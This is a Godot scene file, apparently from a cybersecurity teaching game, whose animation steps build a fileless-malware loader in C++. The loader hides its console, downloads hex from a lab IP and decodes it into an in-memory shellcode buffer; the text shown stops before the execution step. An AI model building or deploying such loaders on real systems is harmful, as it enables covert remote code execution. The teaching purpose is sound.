[gd_scene load_steps=55 format=3 uid="uid://dnj8fsi1dawwb"]

[ext_resource type="Script" uid="uid://5e1pg0h8twbo" path="res://Scenes/GUI/CyberattacksV2/FilelessV2/fileless.gd" id="1_q0tlf"]
[ext_resource type="FontFile" uid="uid://bbhvwm260bx4g" path="res://Assets/Fonts/avantgarde_demi.ttf" id="2_qxdw1"]
[ext_resource type="FontFile" uid="uid://c4mm3of2mc8o5" path="res://addons/phantom_camera/fonts/Nunito-Black.ttf" id="3_oducy"]
[ext_resource type="Script" uid="uid://dymocqk677j5n" path="res://Scripts/GUI/code_edit_window.gd" id="4_dsue1"]
[ext_resource type="PackedScene" uid="uid://cbqaj2456biy" path="res://Scenes/GUI/next_button.tscn" id="5_evr5x"]
[ext_resource type="PackedScene" uid="uid://cfnlekhp378nk" path="res://Scenes/GUI/back_button.tscn" id="6_l34d4"]

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_t4n35"]
content_margin_left = 19.0
bg_color = Color(0.11764706, 0.11764706, 0.1882353, 1)

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_qmx2e"]
content_margin_left = 10.0
content_margin_right = 10.0
bg_color = Color(0.11960501, 0.1159, 0.19, 1)
corner_radius_top_left = 15
corner_radius_top_right = 15
corner_radius_bottom_right = 15
corner_radius_bottom_left = 15

[sub_resource type="FontVariation" id="FontVariation_h8m8q"]
base_font = ExtResource("3_oducy")

[sub_resource type="DPITexture" id="DPITexture_pkbn6"]
_source = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\"><path fill=\"none\" stroke=\"#b2b2b2\" stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-opacity=\".45\" stroke-width=\"2\" d=\"m5 7 3 3 3-3\"/></svg>
"

[sub_resource type="DPITexture" id="DPITexture_cxtjw"]
_source = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\"><path fill=\"none\" stroke=\"#b2b2b2\" stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-opacity=\".45\" stroke-width=\"2\" d=\"m11.011063 9.9776246-3.0222094-2.9776246-2.9776247 3.02221\"/></svg>
"

[sub_resource type="DPITexture" id="DPITexture_wf7ls"]
_source = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\"><path fill=\"none\" stroke=\"#b2b2b2\" stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-opacity=\".45\" stroke-width=\"2\" d=\"m6 11 3-3-3-3\"/></svg>
"

[sub_resource type="DPITexture" id="DPITexture_vuf0p"]
_source = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\"><path fill=\"none\" stroke=\"#b2b2b2\" stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-opacity=\".45\" stroke-width=\"2\" d=\"m9 11-3-3 3-3\"/></svg>
"

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_gu46y"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_oekl0"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_i7g13"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_k4s4l"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_xwue7"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_de0th"]

[sub_resource type="FontVariation" id="FontVariation_31cwg"]
base_font = ExtResource("3_oducy")

[sub_resource type="Theme" id="Theme_x5n46"]
FoldableContainer/colors/collapsed_font_color = Color(1, 1, 1, 1)
FoldableContainer/colors/font_color = Color(1, 1, 1, 1)
FoldableContainer/colors/font_outline_color = Color(1, 1, 1, 1)
FoldableContainer/colors/hover_font_color = Color(0.95, 0.95, 0.95, 1)
FoldableContainer/constants/h_separation = 2
FoldableContainer/constants/outline_size = 0
FoldableContainer/font_sizes/font_size = 24
FoldableContainer/fonts/font = SubResource("FontVariation_h8m8q")
FoldableContainer/icons/expanded_arrow = SubResource("DPITexture_pkbn6")
FoldableContainer/icons/expanded_arrow_mirrored = SubResource("DPITexture_cxtjw")
FoldableContainer/icons/folded_arrow = SubResource("DPITexture_wf7ls")
FoldableContainer/icons/folded_arrow_mirrored = SubResource("DPITexture_vuf0p")
FoldableContainer/styles/focus = SubResource("StyleBoxEmpty_gu46y")
FoldableContainer/styles/panel = SubResource("StyleBoxEmpty_oekl0")
FoldableContainer/styles/title_collapsed_hover_panel = SubResource("StyleBoxEmpty_i7g13")
FoldableContainer/styles/title_collapsed_panel = SubResource("StyleBoxEmpty_k4s4l")
FoldableContainer/styles/title_hover_panel = SubResource("StyleBoxEmpty_xwue7")
FoldableContainer/styles/title_panel = SubResource("StyleBoxEmpty_de0th")
RichTextLabel/font_sizes/normal_font_size = 22
RichTextLabel/fonts/normal_font = SubResource("FontVariation_31cwg")

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_0dqkl"]
bg_color = Color(0.11960501, 0.1159, 0.19, 1)
corner_radius_top_left = 15
corner_radius_top_right = 15
corner_radius_bottom_right = 15
corner_radius_bottom_left = 15

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_qmx2e"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_0tp54"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_h8m8q"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_pkbn6"]

[sub_resource type="Shader" id="Shader_wwpmy"]
code = "shader_type canvas_item;
render_mode blend_mix, unshaded;

// The full color of the rectangle
uniform vec4 rect_color : source_color = vec4(1.0, 0.2, 0.2, 1.0); // red

// Hole configuration
uniform vec2 hole_position = vec2(0.0, 0.0); // Top-left corner of the hole (in pixels)
uniform vec2 hole_size = vec2(50.0, 50.0);   // Width and height of the hole (square or rectangle)

void fragment() {
    // Convert UV to local pixel coordinates
    vec2 pixel_pos = UV * vec2(textureSize(TEXTURE, 0));

    // Check if we're inside the hole area
    bool in_hole = pixel_pos.x > hole_position.x &&
                   pixel_pos.x < hole_position.x + hole_size.x &&
                   pixel_pos.y > hole_position.y &&
                   pixel_pos.y < hole_position.y + hole_size.y;

    if (in_hole) {
        discard; // Make transparent
    }

    COLOR = rect_color;
}
"

[sub_resource type="ShaderMaterial" id="ShaderMaterial_gu46y"]
resource_local_to_scene = true
shader = SubResource("Shader_wwpmy")
shader_parameter/rect_color = Color(0, 0, 0, 0.505882)
shader_parameter/hole_position = Vector2(0.025, 1.315)
shader_parameter/hole_size = Vector2(2.555, 0.415)

[sub_resource type="Animation" id="Animation_q0tlf"]
resource_name = "fileless_1"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["⚠️FILELESS MALWARE⚠️"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Fileless malware is a stealthy type of malicious software. Instead of installing a file on your computer, it runs entirely in memory using trusted system tools. This makes it hard to detect and allows attackers to steal data or control your computer without leaving obvious traces.."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [""]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [false]
}

[sub_resource type="Animation" id="Animation_yvlyr"]
resource_name = "fileless_2"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Now let's create our boilerplate"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [""]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [false]
}

[sub_resource type="Animation" id="Animation_rvh2y"]
resource_name = "fileless_3"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Now this are just the liblaries that we needed "]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(-0.00999999, 0.13499999), Vector2(1.775, 0.985)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 0.1), Vector2(0.025, 0.1)]
}

[sub_resource type="Animation" id="Animation_krri1"]
resource_name = "fileless_4"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["This line prevents a visible console window from showing, so our program runs silently
"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(1.775, 0.985), Vector2(3.68, 0.82)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 0.1), Vector2(0.025, 1.29)]
}

[sub_resource type="Animation" id="Animation_e02ds"]
resource_name = "fileless_5"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["Uses the cpr HTTP library to request data from the given address"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.68, 0.82), Vector2(3.27, 0.73)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 1.29), Vector2(0.025, 1.97)]
}

[sub_resource type="Animation" id="Animation_33oqg"]
resource_name = "fileless_6"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["This group of lines converts the downloaded text into bytes in memory"]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });
	char* memBuffer = NULL;
	memBuffer = (char *)r.text.c_str(); 
	
	unsigned char shellcode[382]; 
	memBuffer += 2; 
	for (size_t count = 0; count < sizeof shellcode - 1; count++) { 
		sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]); 
		memBuffer = memBuffer + 4;
	}"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.27, 0.73), Vector2(3.715, 3.415)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 1.97), Vector2(0.025, 0.425)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 0,
"values": [6.999999999999998]
}

[sub_resource type="Animation" id="Animation_pwtf5"]
resource_name = "fileless_7"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["That line takes the text you downloaded from the server, turns it into a C-style string, and stores its starting memory address in memBuffer so the program can read through it."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });
	char* memBuffer = NULL;
	memBuffer = (char *)r.text.c_str(); 
	
	unsigned char shellcode[382]; 
	memBuffer += 2; 
	for (size_t count = 0; count < sizeof shellcode - 1; count++) { 
		sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]); 
		memBuffer = memBuffer + 4;
	}"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(3.715, 3.415), Vector2(2.785, 0.71)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 0.425), Vector2(0.025, 0.425)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 0,
"values": [6.999999999999998]
}

[sub_resource type="Animation" id="Animation_i1bj2"]
resource_name = "fileless_8"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["That line takes the text you downloaded from the server, turns it into a C-style string, and stores its starting memory address in memBuffer so the program can read through it."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });
	char* memBuffer = NULL;
	memBuffer = (char *)r.text.c_str(); 
	
	unsigned char shellcode[382]; 
	memBuffer += 2; 
	for (size_t count = 0; count < sizeof shellcode - 1; count++) { 
		sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]); 
		memBuffer = memBuffer + 4;
	}"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(2.555, 0.415), Vector2(1.64, 0.35)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 1.315), Vector2(0.025, 1.68)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 0,
"values": [6.999999999999998]
}

[sub_resource type="Animation" id="Animation_nteir"]
resource_name = "fileless_9"
tracks/0/type = "value"
tracks/0/imported = false
tracks/0/enabled = true
tracks/0/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer:title")
tracks/0/interp = 1
tracks/0/loop_wrap = true
tracks/0/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["STEP 3: BOILERPLATE"]
}
tracks/1/type = "value"
tracks/1/imported = false
tracks/1/enabled = true
tracks/1/path = NodePath("Body/ExplanationPanel/VBoxContainer/FoldableContainer/RichTextLabel:text")
tracks/1/interp = 1
tracks/1/loop_wrap = true
tracks/1/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["This loop reads each pair of hex characters from memBuffer, converts them into real bytes stored in shellcode[count], then moves the pointer forward to process the next byte."]
}
tracks/2/type = "value"
tracks/2/imported = false
tracks/2/enabled = true
tracks/2/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:text")
tracks/2/interp = 1
tracks/2/loop_wrap = true
tracks/2/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": ["#include <iostream>
#include <cpr/cpr.h>
#include <windows.h>

int main() {
	 ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
	cpr::Response r = cpr::Get(cpr::Url{ \"http://192.168.56.102/home\" });
	char* memBuffer = NULL;
	memBuffer = (char *)r.text.c_str(); 
	
	unsigned char shellcode[382]; 
	memBuffer += 2; 
	for (size_t count = 0; count < sizeof shellcode - 1; count++) { 
		sscanf_s(memBuffer, \"%02hhx\", &shellcode[count]); 
		memBuffer = memBuffer + 4;
	}"]
}
tracks/3/type = "value"
tracks/3/imported = false
tracks/3/enabled = true
tracks/3/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:visible")
tracks/3/interp = 1
tracks/3/loop_wrap = true
tracks/3/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
"update": 1,
"values": [true]
}
tracks/4/type = "value"
tracks/4/imported = false
tracks/4/enabled = true
tracks/4/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_size")
tracks/4/interp = 1
tracks/4/loop_wrap = true
tracks/4/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(1.64, 0.35), Vector2(3.7, 1.865)]
}
tracks/5/type = "value"
tracks/5/imported = false
tracks/5/enabled = true
tracks/5/path = NodePath("Body/CodeContainer/PanelContainer/Overlay:material:shader_parameter/hole_position")
tracks/5/interp = 1
tracks/5/loop_wrap = true
tracks/5/keys = {
"times": PackedFloat32Array(0, 1),
"transitions": PackedFloat32Array(1, 1),
"update": 0,
"values": [Vector2(0.025, 1.68), Vector2(0.025, 1.98)]
}
tracks/6/type = "value"
tracks/6/imported = false
tracks/6/enabled = true
tracks/6/path = NodePath("Body/CodeContainer/PanelContainer/MarginContainer/CodeEdit:scroll_vertical")
tracks/6/interp = 1
tracks/6/loop_wrap = true
tracks/6/keys = {
"times": PackedFloat32Array(0),
"transitions": PackedFloat32Array(1),
